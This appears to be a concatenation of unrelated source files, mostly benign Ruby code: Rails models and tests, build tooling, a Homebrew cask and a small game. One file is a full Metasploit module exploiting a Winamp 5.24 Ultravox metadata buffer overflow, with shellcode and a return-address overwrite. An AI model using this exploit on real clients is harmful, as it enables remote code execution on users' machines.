    # ascending on the primary key ("id ASC") to make the batch ordering
    # work. This also means that this method only works with integer-based
    # primary keys.
    #
    # NOTE: You can't set the limit either, that's used to control
    # the batch sizes.
    def find_each(options = {})
      if block_given?
        find_in_batches(options) do |records|
          records.each { |record| yield record }
        end
      else
        enum_for :find_each, options
      end
    end

    # Yields each batch of records that was found by the find +options+ as
    # an array.
    #
    #   Person.where("age > 21").find_in_batches do |group|
    #     sleep(50) # Make sure it doesn't get too crowded in there!
    #     group.each { |person| person.party_all_night! }
    #   end
    #
    # ==== Options
    # * <tt>:batch_size</tt> - Specifies the size of the batch. Default to 1000.
    # * <tt>:start</tt> - Specifies the starting point for the batch processing.
    #   This is especially useful if you want multiple workers dealing with
    #   the same processing queue. You can make worker 1 handle all the records
    #   between id 0 and 10,000 and worker 2 handle from 10,000 and beyond
    #   (by setting the +:start+ option on that worker).
    #
    #   # Let's process the next 2000 records
    #   Person.find_in_batches(start: 2000, batch_size: 2000) do |group|
    #     group.each { |person| person.party_all_night! }
    #   end
    #
    # NOTE: It's not possible to set the order. That is automatically set to
    # ascending on the primary key ("id ASC") to make the batch ordering
    # work. This also means that this method only works with integer-based
    # primary keys.
    #
    # NOTE: You can't set the limit either, that's used to control
    # the batch sizes.
    def find_in_batches(options = {})
      options.assert_valid_keys(:start, :batch_size)

      relation = self

      unless arel.orders.blank? && arel.taken.blank?
        ActiveRecord::Base.logger.warn("Scoped order and limit are ignored, it's forced to be batch order and batch size")
      end

      start = options.delete(:start)
      batch_size = options.delete(:batch_size) || 1000

      relation = relation.reorder(batch_order).limit(batch_size)
      records = start ? relation.where(table[primary_key].gteq(start)).to_a : relation.to_a

      while records.any?
        records_size = records.size
        primary_key_offset = records.last.id

        yield records

        # A short batch means we have reached the end of the table.
        break if records_size < batch_size

        if primary_key_offset
          records = relation.where(table[primary_key].gt(primary_key_offset)).to_a
        else
          raise "Primary key not included in the custom select clause"
        end
      end
    end

    private

    # Batches are always paged in ascending primary-key order.
    def batch_order
      "#{quoted_table_name}.#{quoted_primary_key} ASC"
    end
  end
end
| 36.464 | 122 | 0.652699 |
bb9511a33713f1fd7b545cfd79201a453e723fc4 | 248 | class ErrorMessage < ActiveRecord::Base
belongs_to :user

validates :message, :fix, :image, presence: true

# Paperclip attachment; the :medium style is a 400x400 center-crop ("#").
has_attached_file :image, styles: { :medium => "400x400#" }
# NOTE(review): \Z permits a trailing newline; \A...\z would be stricter
# for validating the content type -- confirm before tightening.
validates_attachment_content_type :image, content_type: /\Aimage\/.*\Z/
end
| 27.555556 | 72 | 0.741935 |
3977b137f7766e0242dd7bbf8896f4c90fa3f1e9 | 6,836 | # frozen_string_literal: true
require File.expand_path(File.dirname(__FILE__) + '/../rails_helper')
require File.expand_path(File.dirname(__FILE__) + '/../arp_spec_helper')
# Controller specs for account creation and login flows.
describe AccountsController do
  before(:context) do
    @user = create_user!
  end

  describe AccountsController, 'during account creation' do
    it 'should not allow periods in login name' do
      post :create, params: { account: { login: 'foobar.baz', password: 'barbarbar',
                                         password_confirmation: 'barbarbar',
                                         email: '[email protected]' } }
      expect(assigns(:account)).to_not be_valid
      expect(response).to render_template('new')
    end
  end

  describe AccountsController, 'when logging in' do
    # The pre-login destination stored in the session must be honoured.
    it 'should remember the requested location in a non-logged-in state and redirect.' do
      request.session[:return_to] = 'http://www.google.com'
      post :login_attempt, params: { account: { login: @user.login, password: 'mysecret' } }
      expect(response).to redirect_to('http://www.google.com')
    end

    it 'should redirect to dashboard if already logged in' do
      login_as_user!
      get :login
      expect(response).to redirect_to(dashboard_path)
    end
  end
end
describe AccountsController do
before(:context) do
  @user = create_user!
end

describe 'Edit account' do
  before do
    login!(@user.login, 'mysecret')
  end

  it 'should respond with success' do
    get :edit, params: { id: @user.id }
    expect(@response).to be_successful
  end

  it 'should get account info from current logged in user' do
    get :edit, params: { id: @user.id }
    expect(assigns(:account)).to eq @user
  end

  # Requesting another user's id must not leak that user's account.
  it 'should not get account info from another user' do
    @other = create(:account_user, login: 'other')
    get :edit, params: { id: @other.id }
    expect(assigns(:account)).to_not eq @other
  end
end

describe 'Show account' do
  it 'should redirect to edit' do
    @user = login_as_user!
    get :show, params: { id: @user.id }
    expect(@response).to redirect_to(edit_account_path(@user))
  end
end

describe 'Forgot password' do
  it 'should not require login' do
    get :forgot_password
    expect(@response).to be_successful
    expect(@response).to render_template('forgot_password')
  end
end
describe 'Provisioning Actions' do
before do
  @account = login_as_user!
end

# Helper: fetch the JSON IP-address inventory for @location.
def do_get_ip_address_inventory
  get :ip_address_inventory, params: { location: @location, format: :json }
end
context 'with valid location' do
before do
  @location = 'lax'
  @location_obj = Location.new(code: @location)
  allow(Location).to receive(:find_by).with(code: @location)\
    .and_return(@location_obj)
end

context 'with IPs in use' do
  before do
    @ips_in_use = ['10.0.0.2', '10.0.0.3']
    allow(@account).to receive(:ips_in_use).and_return(@ips_in_use)
  end

  it 'should mark them in use' do
    do_get_ip_address_inventory
    expect(@response).to be_successful
    json_response = JSON.parse(@response.body)
    ips = json_response['ips']
    expect(ips.size).to eq @ips_in_use.size
    @ips_in_use.each do |available_ip|
      expect(ips[available_ip]).not_to be_nil
      expect(ips[available_ip]['assigned']).to be true
    end
  end

  # Entries that are in use must also carry assignment details.
  it 'should have further assignment information' do
    do_get_ip_address_inventory
    expect(@response).to be_successful
    json_response = JSON.parse(@response.body)
    ips = json_response['ips']
    expect(ips.size).to eq @ips_in_use.size
    @ips_in_use.each do |available_ip|
      expect(ips[available_ip]).not_to be_nil
      expect(ips[available_ip]['assignment']).not_to be_nil
      expect(ips[available_ip]['assignment']).not_to be_empty
    end
  end
end
context 'with IPs available' do
before do
@ips_available = ['10.0.0.4', '10.0.0.5', '10.0.0.6']
allow(@account).to receive(:ips_available)\
.with(location: @location_obj).and_return(@ips_available)
end
it 'should set caption for location' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
caption = json_response['caption']
expect(caption).to match(/Please Choose/)
end
it 'should include IP address in hash' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['ip_address']).to eq available_ip
end
end
it 'should mark them available' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['assigned']).to be false
end
end
it 'should be assigned to the correct location' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['location']).to eq @location
end
end
it 'should not have any further assignment information' do
do_get_ip_address_inventory
expect(@response).to be_successful
json_response = JSON.parse(@response.body)
ips = json_response['ips']
expect(ips.size).to eq @ips_available.size
@ips_available.each do |available_ip|
expect(ips[available_ip]).not_to be_nil
expect(ips[available_ip]['assignment']).to be_nil
end
end
end
end
context 'with invalid location' do
before do
@location = 'ams'
end
it 'should return empty set' do
do_get_ip_address_inventory
expect(@response).to_not be_successful
expect(@response.body).to include('No such location')
end
end
end
end
| 30.792793 | 92 | 0.619661 |
9192890bb9e3aad937b5432728f3785d29aa59af | 3,199 | require File.expand_path(File.dirname(__FILE__) + "/../test_helper")
# Routing round-trip tests for page/article URLs, including locale
# ('/de') and page-path prefixes plus pagination suffixes.
class PageArticlesRoutesTest < ActionController::TestCase
tests ArticlesController
with_common :a_page, :an_article
# Recognize each path, then regenerate a URL from the recognized params;
# the two must be identical (round-trip property).
paths = %W( /pages/1
/pages/1/comments.atom
/pages/1/articles/an-article
/pages/1/articles/an-article.atom )
paths.each do |path|
test "regenerates the original path from the recognized params for #{path}" do
without_routing_filters do
params = ActionController::Routing::Routes.recognize_path(path, :method => :get)
assert_equal path, @controller.url_for(params.merge(:only_path => true))
end
end
end
describe "routing" do
# Cartesian product of locale/page prefixes and pagination suffixes.
['', '/a-page', '/de', '/de/a-page'].each do |path_prefix|
['', '/pages/2'].each do |path_suffix|
common = { :section_id => Section.first.id.to_s, :path_prefix => path_prefix, :path_suffix => path_suffix }
common.merge! :locale => 'de' if path_prefix =~ /de/
common.merge! :page => 2 if path_suffix =~ /pages/
with_options common do |r|
r.it_maps :get, '/', :action => 'index'
r.it_maps :get, '/articles/an-article', :action => 'show', :permalink => 'an-article'
unless path_suffix =~ /pages/
r.it_maps :get, '/articles/an-article.atom', :action => 'comments', :permalink => 'an-article', :format => 'atom'
end
end
end
end
# these do not work with a root page path because there's a regular Comments resource
with_options :action => 'comments', :format => 'atom', :section_id => Section.first.id.to_s do |r|
r.it_maps :get, '/a-page/comments.atom'
r.it_maps :get, '/de/a-page/comments.atom', :locale => 'de'
end
end
describe "the url_helper page_path" do
before :each do
# FIXME move to db/populate?
other = @section.site.sections.create! :title => 'another page'
other.move_to_left_of @section
url_rewriter = ActionController::UrlRewriter.new @request, :controller => 'pages', :page => @section.id
@controller.instance_variable_set :@url, url_rewriter
@controller.instance_variable_set :@site, @site
I18n.default_locale = :en
I18n.locale = :de
end
# Lambdas are evaluated lazily inside each it_rewrites example.
page_path = lambda { page_path(@section) }
article_path = lambda { page_article_path(@section, 'an-article') }
it_rewrites page_path, :to => '/', :with => [:is_default_locale, :is_root_section]
it_rewrites page_path, :to => '/a-page', :with => [:is_default_locale]
it_rewrites page_path, :to => '/de', :with => [:is_root_section]
it_rewrites page_path, :to => '/de/a-page'
it_rewrites article_path, :to => '/articles/an-article', :with => [:is_default_locale, :is_root_section]
it_rewrites article_path, :to => '/a-page/articles/an-article', :with => [:is_default_locale]
it_rewrites article_path, :to => '/de/articles/an-article', :with => [:is_root_section]
it_rewrites article_path, :to => '/de/a-page/articles/an-article'
end
end | 43.821918 | 125 | 0.610191 |
ac1ee50e331bb76bf050e281ff20ad3f93d0aa35 | 922 | cask "hstracker" do
version "1.7.8"
sha256 "152b199825c7049435a51421d0871507cfa30507316db37aa31c2be1639e427a"
# Download served from GitHub releases; `verified` pins the redirect host.
url "https://github.com/HearthSim/HSTracker/releases/download/#{version}/HSTracker.app.zip",
verified: "github.com/HearthSim/HSTracker/"
appcast "https://github.com/HearthSim/HSTracker/releases.atom"
name "Hearthstone Deck Tracker"
desc "Deck tracker and deck manager for Hearthstone"
homepage "https://hsdecktracker.net/"
app "HSTracker.app"
# Residual files removed by `brew uninstall --zap`.
zap trash: [
"~/Library/Application Support/HSTracker",
"~/Library/Application Support/net.hearthsim.hstracker",
"~/Library/Caches/HSTracker",
"~/Library/Caches/net.hearthsim.hstracker",
"~/Library/Cookies/net.hearthsim.hstracker.binarycookies*",
"~/Library/Logs/HSTracker",
"~/Library/Preferences/net.hearthsim.hstracker.plist",
"~/Library/Saved Application State/net.hearthsim.hstracker.savedState",
]
end
| 36.88 | 94 | 0.74295 |
4ad75e8b7aa0c4f20a5bed3ed21103dc06b5033b | 1,060 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_06_19_215423) do
# `cars` rows: title/image_url/description plus free-form `condition`
# and `available` strings (no DB-level constraint on either).
create_table "cars", force: :cascade do |t|
t.string "title"
t.string "image_url"
t.string "description"
t.string "condition"
t.string "available"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
end
end
| 40.769231 | 86 | 0.757547 |
6abb75641a5edf7e21cef05e88026361d392e3b5 | 1,422 | require File.dirname(__FILE__) + '/../test_helper'
require 'document_controller'
# Re-raise errors caught by the controller.
class DocumentController; def rescue_action(e) raise e end; end # let the real exception surface in tests instead of a rendered error page
# Functional tests for DocumentController: URL routing for
# percent-encoded document names and index ordering.
class DocumentControllerTest < ActionController::TestCase
fixtures :documents
def setup
@controller = DocumentController.new
@request = ActionController::TestRequest.new
@response = ActionController::TestResponse.new
end
# Document names containing spaces are routed via %20 encoding.
def test_routing
print "XXXX Testing Document Routing"
with_options :controller => 'document', :action => 'show' do |r|
r.assert_routing "/document/this%20is%20a%20good%20idea", :name => 'this is a good idea'
r.assert_routing "/document/this%20is%20a%20good%20idea%20for%20talks.cam", :name => 'this is a good idea for talks.cam'
# Can't find where this modification is supposed to happen, so removed the +s from the test for the time being
#r.assert_routing "/document/this+is+a+good+idea", :name => 'this is a good idea'
#r.assert_routing "/document/this+is+a+good+idea+for+talks.cam", :name => 'this is a good idea for talks.cam'
end
end
# Index must return the two fixture documents in alphabetical order.
def test_index_sorts_alphabetically
get :index
assert_response :success
index = assigns(:documents)
assert_kind_of Array, index
assert_equal 2, index.size
assert_equal documents(:first), index.first
assert_equal documents(:second), index.last
end
end
| 36.461538 | 126 | 0.71519 |
870ccfa576e19d26ecc211f39cb001b8a193926a | 1,793 | module MRuby
# Mixin that adds mrbgem / gembox loading to an MRuby build configuration.
module LoadGems
  # Loads a .gembox file (a named collection of gem declarations) from
  # MRUBY_ROOT/mrbgems and evaluates its contents against this build.
  def gembox(gemboxfile)
    gembox = File.expand_path("#{gemboxfile}.gembox", "#{MRUBY_ROOT}/mrbgems")
    # File.exists? was removed in Ruby 3.2; File.exist? is the supported form.
    fail "Can't find gembox '#{gembox}'" unless File.exist?(gembox)
    GemBox.config = self
    instance_eval File.read(gembox)
  end

  # Registers a single mrbgem. +gemdir+ is either a path (relative paths
  # resolve against the calling file's directory) or an options Hash
  # (:core, :git, :github, :bitbucket, plus :branch/:options for git).
  # An optional block becomes the gem's build-config initializer.
  # Returns the registered Gem, or nil if the mrbgem.rake set no current gem.
  def gem(gemdir, &block)
    caller_dir = File.expand_path(File.dirname(/^(.*?):\d/.match(caller.first).to_a[1]))
    if gemdir.is_a?(Hash)
      gemdir = load_special_path_gem(gemdir)
    else
      gemdir = File.expand_path(gemdir, caller_dir)
    end
    gemrake = File.join(gemdir, "mrbgem.rake")
    fail "Can't find #{gemrake}" unless File.exist?(gemrake)
    Gem.current = nil
    load gemrake
    return nil unless Gem.current
    Gem.current.dir = gemdir
    Gem.current.build = MRuby::Build.current
    Gem.current.build_config_initializer = block
    gems << Gem.current
    Gem.current
  end

  # Resolves the Hash form of a gem declaration to a local directory,
  # cloning remote (git/github/bitbucket) gems on first use.
  def load_special_path_gem(params)
    if params[:github]
      params[:git] = "https://github.com/#{params[:github]}.git"
    elsif params[:bitbucket]
      params[:git] = "https://bitbucket.org/#{params[:bitbucket]}.git"
    end

    if params[:core]
      gemdir = "#{root}/mrbgems/#{params[:core]}"
    elsif params[:git]
      url = params[:git]
      gemdir = "build/mrbgems/#{url.match(/([-\w]+)(\.[-\w]+|)$/).to_a[1]}"
      return gemdir if File.exist?(gemdir)
      # The original `[params[:options]] || []` was always truthy and could
      # yield [nil]; only include the option when one was actually given.
      options = params[:options] ? [params[:options]] : []
      options << "--branch \"#{params[:branch]}\"" if params[:branch]
      FileUtils.mkdir_p "build/mrbgems"
      git.run_clone gemdir, url, options
    else
      fail "unknown gem option #{params}"
    end
    gemdir
  end

  # True when at least one gem has been registered. (The original text was
  # mangled by an e-mail obfuscator to "[email protected]?"; restored
  # to the upstream expression.)
  def enable_gems?
    !@gems.empty?
  end
end # LoadGems
end # MRuby
| 28.919355 | 90 | 0.600112 |
bb8f88398f2da01fbc9061311999c0d286ff2c9b | 4,563 | require 'opal/path_reader'
require 'opal/builder_processors'
require 'opal/paths'
require 'set'
module Opal
# Builds a Ruby (or stub) source tree into a single JavaScript blob,
# resolving `require` / `require_tree` dependencies via a PathReader
# and per-extension processors.
class Builder
include BuilderProcessors
# Raised when a required file cannot be located on the load paths.
class MissingRequire < LoadError
end
def initialize(options = nil)
# Each option key maps onto a writer (processors=, stubs=, ...).
(options || {}).each_pair do |k,v|
public_send("#{k}=", v)
end
@stubs ||= []
@preload ||= []
@processors ||= DEFAULT_PROCESSORS
@path_reader ||= PathReader.new
@prerequired ||= []
@compiler_options ||= {}
@default_processor ||= RubyProcessor
@processed = []
end
# Convenience one-shot: Builder.build(path) == Builder.new.build(path).
def self.build(*args, &block)
new.build(*args, &block)
end
def build(path, options = {})
source = read(path)
build_str(source, path, options)
end
# Processes +source+ as if it lived at +filename+, pulling in preloads,
# its requires and required trees first. Returns self for chaining.
def build_str source, filename, options = {}
path = path_reader.expand(filename).to_s unless stub?(filename)
asset = processor_for(source, filename, path, options)
requires = preload + asset.requires + tree_requires(asset, path)
requires.map { |r| process_require(r, options) }
processed << asset
self
rescue MissingRequire => error
raise error, "A file required by #{filename.inspect} wasn't found.\n#{error.message}", error.backtrace
end
def build_require(path, options = {})
process_require(path, options)
end
# Deep-ish copy support so dup'ed builders don't share mutable state.
def initialize_copy(other)
super
@stubs = other.stubs.dup
@preload = other.preload.dup
@processors = other.processors.dup
@path_reader = other.path_reader.dup
@prerequired = other.prerequired.dup
@compiler_options = other.compiler_options.dup
@processed = other.processed.dup
end
# Concatenated JavaScript output of everything processed so far.
def to_s
processed.map(&:to_s).join("\n")
end
def source_map
processed.map(&:source_map).reduce(:+).as_json.to_json
end
def append_paths(*paths)
path_reader.append_paths(*paths)
end
include UseGem
attr_reader :processed
attr_accessor :processors, :default_processor, :path_reader,
:compiler_options, :stubs, :prerequired, :preload
private
# Expands an asset's `require_tree` directives into the list of relative
# require names found under the matching load path.
def tree_requires(asset, path)
if path.nil? or path.empty?
dirname = Dir.pwd
else
dirname = File.dirname(File.expand_path(path))
end
paths = path_reader.paths.map{|p| File.expand_path(p)}
asset.required_trees.flat_map do |tree|
expanded = File.expand_path(tree, dirname)
base = paths.find { |p| expanded.start_with?(p) }
next [] if base.nil?
globs = extensions.map { |ext| File.join base, tree, '**', "*.#{ext}" }
Dir[*globs].map do |file|
# Strip the load-path prefix and the (.js).ext suffix to get a require name.
Pathname(file).relative_path_from(Pathname(base)).to_s.gsub(/(\.js)?(\.(?:#{extensions.join '|'}))#{REGEXP_END}/, '')
end
end
end
def processor_for(source, filename, path, options)
processor = processors.find { |p| p.match? path }
processor ||= default_processor
return processor.new(source, filename, compiler_options.merge(options))
end
def read(path)
path_reader.read(path) or
raise MissingRequire, "can't find file: #{path.inspect} in #{path_reader.paths.inspect}"
end
# Processes one require exactly once (deduplicated via already_processed),
# recursing into its own requires before appending the asset itself.
def process_require(filename, options)
filename.gsub!(/\.(rb|js|opal)#{REGEXP_END}/, '')
return if prerequired.include?(filename)
return if already_processed.include?(filename)
already_processed << filename
source = stub?(filename) ? '' : read(filename)
if source.nil?
message = "can't find file: #{filename.inspect}"
case @compiler_options[:dynamic_require_severity]
when :error then raise LoadError, message
when :warning then warn "can't find file: #{filename.inspect}"
end
end
path = path_reader.expand(filename).to_s unless stub?(filename)
asset = processor_for(source, filename, path, options.merge(requirable: true))
process_requires(filename, asset.requires+tree_requires(asset, path), options)
processed << asset
end
def process_requires(filename, requires, options)
requires.map { |r| process_require(r, options) }
rescue MissingRequire => error
raise error, "A file required by #{filename.inspect} wasn't found.\n#{error.message}"
end
def already_processed
@already_processed ||= Set.new
end
def stub? filename
stubs.include?(filename)
end
def extensions
@extensions ||= DEFAULT_PROCESSORS.flat_map(&:extensions).compact
end
end
end
| 28.166667 | 127 | 0.633136 |
# Lazily seeds the pipe geometry on args.state: upper_height is drawn once
# at random in 0...310; lower_height is then derived so the two values sum
# to the 720px screen height. Already-set values are left untouched (||=).
def get_randomness(args)
  state = args.state
  state.upper_height ||= rand(310)
  state.lower_height ||= 720 - state.upper_height
end
# Applies the flap impulse: vertical acceleration snaps to a fixed
# +10 px/frame regardless of its previous value.
def jump(args)
  state = args.state
  state.player_accel = 10
end
# Applies one frame of gravity by decrementing the player's vertical
# acceleration by the configured gravity coefficient.
def gravity(args)
  args.state.player_accel -= args.state.gravity_coeff
end
# Integrates the player's vertical position by the current acceleration.
def move_player(args)
  state = args.state
  state.player_y = state.player_y + state.player_accel
end
# Emits the two pipe rectangles ([x, y, w, h]) at x=1000: one anchored at
# the bottom with height upper_height, one starting at lower_height.
def generate_pipes(args)
  bottom_pipe = [1000, 0, 100, args.state.upper_height]
  top_pipe    = [1000, args.state.lower_height, 100, 730]
  args.outputs.solids.push(bottom_pipe, top_pipe)
end
# Per-frame entry point invoked by the DragonRuby runtime.
# NOTE: the debug label is pushed before player_accel is defaulted, so the
# very first frame renders a nil accel readout — preserved from the original.
def tick(args)
  state   = args.state
  outputs = args.outputs
  outputs.labels << [100, 100, state.player_accel]
  # One-time state initialisation (||= leaves later frames untouched).
  state.player_x      ||= 100
  state.player_y      ||= 360
  state.player_accel  ||= 0
  state.gravity_coeff ||= 0.5
  state.player = [
    state.player_x,              # X
    state.player_y,              # Y
    64,                          # WIDTH
    64,                          # HEIGHT
    'sprites/circle-violet.png'
  ]
  get_randomness(args)
  generate_pipes(args)
  jump(args) if args.inputs.keyboard.key_down.a
  gravity(args)
  move_player(args)
  outputs.background_color = [50, 130, 190]
  outputs.sprites << state.player
end
| 25.045455 | 78 | 0.717786 |
611dd437adc1c7d6ce0080bfa4e1a31be36d3364 | 3,735 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# Metasploit server-side exploit: hosts a fake Ultravox stream and delivers
# an oversized <artist> tag to any Winamp 5.24 client that connects
# (CVE-2008-0065). Byte strings and offsets below are target-specific and
# must not be altered.
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Winamp 5.24. By
sending an overly long artist tag, a remote attacker may
be able to execute arbitrary code. This vulnerability can be
exploited from the browser or the winamp client itself.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-0065' ],
[ 'OSVDB', '41707' ],
[ 'BID', '27344' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Winamp 5.24', { 'Ret' => 0x15010d3e } ],
],
'Privileged' => false,
'DisclosureDate' => 'Jan 18 2008',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The HTTP daemon port to listen on.", 8080 ])
], self.class)
end
# Called by TcpServer for each new client: builds the Ultravox frame
# (NOP sled + payload + return-address overwrite + backwards jmp) wrapped
# in an Ultravox HTTP response, sends it, then closes the connection.
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
res = client.get_once
content = "\x00\x01\x00\x01\x00\x01" + "<metadata><song><artist>"
content << make_nops(3828 - payload.encoded.length) + payload.encoded
content << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
content << [0xe8, -850].pack('CV') + rand_text_alpha_upper(1183)
content << "</artist></song></metadata>"
# Ultravox message framing: sync/type bytes + big-endian payload length.
sploit = "\x5a\x00\x39\x01" + [content.length].pack('n')
sploit << content + "\x00"
# randomize some stuff.
num = rand(65535).to_s
header = "HTTP/1.0 200 OK\r\n"
header << "Server: Ultravox 3.0\r\n"
header << "Content-Type: misc/ultravox\r\n"
header << "Ultravox-SID: #{num}\r\n"
header << "Ultravox-Avg-Bitrate: #{num}\r\n"
header << "Ultravox-Max-Bitrate: #{num}\r\n"
header << "Ultravox-Max-Msg: #{num}\r\n"
header << "Ultravox-Stream-Info: Ultravox;Live Stream\r\n"
header << "Ultravox-Msg-Que: #{num}\r\n"
header << "Ultravox-Max-Fragments: 1\r\n\r\n"
header << sploit
print_status("Sending #{header.length} bytes")
client.put(header)
handler(client)
service.close_client(client)
end
end
=begin
HTTP/1.0 200
.Server: Ultravo
x 3.0..Content-T
ype: misc/ultrav
ox..Ultravox-SID
: 22221..Ultravo
x-Avg-Bitrate: 6
4000..Ultravox-M
ax-Bitrate: 9600
0..Ultravox-Max-
Msg: 16000..Ultr
avox-Stream-Info
: Ultravox;Live
Stream..Ultravox
-Msg-Que: 39..Ul
travox-Max-Fragm
Z.9..,......<met
adata><length>0<
/length><soon>Mo
re on
</soon><song><na
me>The Night
ghts In
tin</name><album
>Days Of
Passed</album><a
rtist>The Moody
Blues</artist><a
lbum_art>xm/stat
ion_logo_WBCRHT.
jpg</album_art><
album_art_200>xm
/station_logo_WB
CRHT_200.jpg</al
bum_art_200><ser
ial>-1</serial><
song_id>-1</song
_id><amg_song_id
>-1</amg_song_id
><amg_artist_id>
-1</amg_artist_i
d><amg_album_id>
-1</amg_album_id
><itunes_song_id
>-1</itunes_song
_id><itunes_arti
st_id>-1</itunes
_artist_id><itun
es_album_id>-1</
itunes_album_id>
</song></metadat
a>.Z.......\./!.
!.UP.......B...&
Z....D)ydB.,.vy/
=end
| 23.639241 | 89 | 0.635341 |
ede6c8d58d460f636df94d1ef20057c11dd150ff | 822 | require 'xcodeproj/scheme/xml_element_wrapper'
module Xcodeproj
class XCScheme
# This abstract class aims to be the base class for every XxxAction class
# that have a #build_configuration attribute
#
# Reads/writes the `buildConfiguration` XML attribute on the wrapped
# scheme-action element (@xml_element comes from XMLElementWrapper).
class AbstractSchemeAction < XMLElementWrapper
# @return [String]
# The build configuration associated with this action
# (usually either 'Debug' or 'Release')
#
def build_configuration
@xml_element.attributes['buildConfiguration']
end
# @param [String] config_name
# The build configuration to associate with this action
# (usually either 'Debug' or 'Release')
#
def build_configuration=(config_name)
@xml_element.attributes['buildConfiguration'] = config_name
end
end
end
end
| 30.444444 | 77 | 0.663017 |
ff3edc0656ed7afa9807c9603af95c230cceeec7 | 315 | require "algebra"
# Demo for the `algebra` gem: computes a Groebner basis (with cofactor
# coefficients) for the ideal <f1, f2, f3> in Q[x, y, z] and checks that
# each basis element equals the inner product of its coefficient row with
# the original generators.
P = MPolynomial(Rational)
x, y, z = P.vars "xyz"
f1 = x**2 + y**2 + z**2 -1
f2 = x**2 + z**2 - y
f3 = x - z
coeff, basis = Groebner.basis_coeff([f1, f2, f3])
basis.each_with_index do |b, i|
p [coeff[i].inner_product([f1, f2, f3]), b]
p coeff[i].inner_product([f1, f2, f3]) == b #=> true
end
| 22.5 | 54 | 0.587302 |
875b0e98a2bc5411c5d17db0dba05b8d69ce2d42 | 7,439 | require "formula"
require "compilers"
# Homebrew extends Ruby's `ENV` to make our code more readable.
# Implemented in {SharedEnvExtension} and either {Superenv} or
# {Stdenv} (depending on the build mode).
# @see Superenv
# @see Stdenv
# @see http://www.rubydoc.info/stdlib/Env Ruby's ENV API
module SharedEnvExtension
include CompilerConstants
# @private
CC_FLAG_VARS = %w[CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS]
# @private
FC_FLAG_VARS = %w[FCFLAGS FFLAGS]
# @private
# Variables scrubbed from the environment before every build (reset).
SANITIZED_VARS = %w[
CDPATH GREP_OPTIONS CLICOLOR_FORCE
CPATH C_INCLUDE_PATH CPLUS_INCLUDE_PATH OBJC_INCLUDE_PATH
CC CXX OBJC OBJCXX CPP MAKE LD LDSHARED
CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS LDFLAGS CPPFLAGS
MACOSX_DEPLOYMENT_TARGET SDKROOT DEVELOPER_DIR
CMAKE_PREFIX_PATH CMAKE_INCLUDE_PATH CMAKE_FRAMEWORK_PATH
GOBIN GOPATH GOROOT
LIBRARY_PATH
]
# @private
def setup_build_environment(formula = nil)
@formula = formula
reset
end
# @private
def reset
SANITIZED_VARS.each { |k| delete(k) }
end
# Deletes every compiler/flag variable and returns a Hash of the removed
# key/value pairs so they can be restored later.
def remove_cc_etc
keys = %w[CC CXX OBJC OBJCXX LD CPP CFLAGS CXXFLAGS OBJCFLAGS OBJCXXFLAGS LDFLAGS CPPFLAGS]
removed = Hash[*keys.flat_map { |key| [key, self[key]] }]
keys.each do |key|
delete(key)
end
removed
end
def append_to_cflags(newflags)
append(CC_FLAG_VARS, newflags)
end
def remove_from_cflags(val)
remove CC_FLAG_VARS, val
end
# Appends +value+ to each of +keys+, inserting +separator+ only when the
# variable already has content.
def append(keys, value, separator = " ")
value = value.to_s
Array(keys).each do |key|
old = self[key]
if old.nil? || old.empty?
self[key] = value
else
self[key] += separator + value
end
end
end
def prepend(keys, value, separator = " ")
value = value.to_s
Array(keys).each do |key|
old = self[key]
if old.nil? || old.empty?
self[key] = value
else
self[key] = value + separator + old
end
end
end
# Appends only when +path+ is an existing directory.
def append_path(key, path)
append key, path, File::PATH_SEPARATOR if File.directory? path
end
# Prepends a directory to `PATH`.
# Is the formula struggling to find the pkgconfig file? Point it to it.
# This is done automatically for `keg_only` formulae.
# <pre>ENV.prepend_path "PKG_CONFIG_PATH", "#{Formula["glib"].opt_lib}/pkgconfig"</pre>
def prepend_path(key, path)
prepend key, path, File::PATH_SEPARATOR if File.directory? path
end
# Like prepend_path, but creates the directory first so the
# File.directory? guard inside prepend_path always passes.
def prepend_create_path(key, path)
path = Pathname.new(path) unless path.is_a? Pathname
path.mkpath
